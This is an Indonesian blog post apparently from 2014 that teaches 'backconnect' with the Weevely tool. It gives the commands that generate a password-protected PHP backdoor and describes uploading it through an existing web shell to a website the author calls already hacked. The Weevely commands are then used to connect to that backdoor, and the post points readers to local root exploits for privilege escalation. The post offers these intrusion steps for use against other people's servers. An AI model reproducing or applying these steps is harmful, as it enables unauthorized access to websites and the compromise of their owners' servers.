Breaking News
Loading...
Monday, March 3, 2014

Backconnect Dengan Weevely

2:48 AM
Assalamu'alaikum. Admin ganteng kembali post dipagi buta. Ane mau share tutorial Backconnect pake weevely. Post ini sangat berguna bagi para pentester buat langkah-langkah selanjutnya seperti rooting dan lain-lain. Nah sebelum memulainya / sebelum kita buat santetnya, sedikit penjelasan dulu tentan backconnet itu sendiri. Apa itu Backconnect? Backconnect biasanya digunakan untuk server yg tertutup proxy atau firewall, sehingga tidak bisa di lakukan remote connect. Kalo kita mengconectkan diri ke server target nggak bisa karena tertutup proxy ataupun firewall seperti yang ane bilang sebelumnya maka salah satu triknya adalah membalik koneksi, yaitu mengkoneksikan dari server ke komputer kita. Paham kan?

Sekarang beraksi untuk membuat nya. Merapat nyook...

Alat tempurnya:
1. PC / Laptop yang terkoneksi dengan internet.
2. Website yang sudah kita bolongin dan udah ditanam shell.
3. File backdoor weevely yang nanti kita buat.

Untuk membuatnya pertama tentus aja buka console dulu. Direktori weevely terletak di /pentest/web/backdoors/weevely jadi buka terus eksekusi dah.

root@kurawa:/pentest/web/backdoors/weevely# ./weevely

SS penampakannya kaya gini
Sekarang tinggal kita buat dah.

root@kurawa:/pentest/web/backdoors/weevely# ./weevely.py generate kevoks kurawa.php

keterangan:
1. generate - untuk membuatnya
2. kevoks - password nya, terserah ente. Kalo nggak dikasih masukin 0000
3. kurawa - nama file ayng mau kita buat

Hasilnya kaya gini
Nongol dah tuh kurawa yang tadi kita buat.
Sekarang diapain? hapus aja gan. Hahaha. Bercanda bro. Buka website yang udah kita bolongin ditanem shell. Ane kasih SS shell ane nih gan (jaringan lagi sedikit ngambek).
Terus upload kurawa yang tadi kita buat ke web target dah. Kalo udah sekarang tinggal eksekusi buat backconnectnya (masih pada dir weevely).

./weevely.py http://[ site target ]/media/kurawa.php kevoks

Yosshh.. Langsung nongol noh. Penampakan jadi nya kaya gini nih gan.
Udah tuh sekarang terserah agan mau diapain. Mau rooting? Nggak ada yang nglarang. Kalo nggak punya Local Root silahkan agan baca post ane Auto Local Root Exploit

Kalo nggak termbus berarti muka ente kurang ganteng. Hahaha.. Kalo nggak tembus ya berarti nggak ada yang cocok, cari Local Root yang lain. Cari di pakde google banyak. Sesuaikan sama kernel nya.

Sekian post kali ini. Semoga bermanfaat.

0 comments:

Post a Comment

 
Toggle Footer